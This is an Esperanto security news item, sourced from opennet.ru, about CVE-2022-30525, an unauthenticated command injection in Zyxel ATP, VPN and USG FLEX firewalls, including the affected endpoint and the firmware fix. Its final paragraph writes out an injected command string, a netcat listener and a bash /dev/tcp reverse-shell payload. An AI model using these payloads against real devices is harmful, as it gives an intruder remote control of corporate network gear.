Kritika vundebleco (CVE-2022-30525) estis identigita en Zyxel-aparatoj de la serioj ATP, VPN kaj USG FLEX, dizajnitaj por organizi la funkciadon de fajroŝirmiloj, IDS kaj VPN en entreprenoj, kio permesas al ekstera atakanto ekzekuti kodon sur la aparato sen uzantrajtoj sen aŭtentigo. Por fari atakon, atakanto devas povi sendi petojn al la aparato uzante la HTTP/HTTPS-protokolon. Zyxel riparis la vundeblecon en la ĝisdatigo de firmware ZLD 5.30. Laŭ la Shodan-servo, ekzistas nuntempe 16213 potenciale vundeblaj aparatoj en la tutmonda reto, kiuj akceptas petojn per HTTP/HTTPS.
Operacio estas efektivigita sendante speciale dezajnitajn komandojn al la rettraktilo /ztp/cgi-bin/handler, alirebla sen aŭtentikigo. La problemo estas kaŭzita de la manko de taŭga purigado de petaj parametroj dum plenumado de komandoj en la sistemo uzante la os.system-vokon uzatan en la biblioteko lib_wan_settings.py kaj efektivigita dum prilaborado de la operacio setWanPortSt.
Ekzemple, atakanto povus pasi la ŝnuron “; ping 192.168.1.210;" kiu kondukos al la ekzekuto de la komando "ping 192.168.1.210" en la sistemo. Por akiri aliron al la komanda ŝelo, vi povas ruli "nc -lvnp 1270" en via sistemo, kaj poste komenci inversan konekton sendante peton al la aparato kun la '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.
fonto: opennet.ru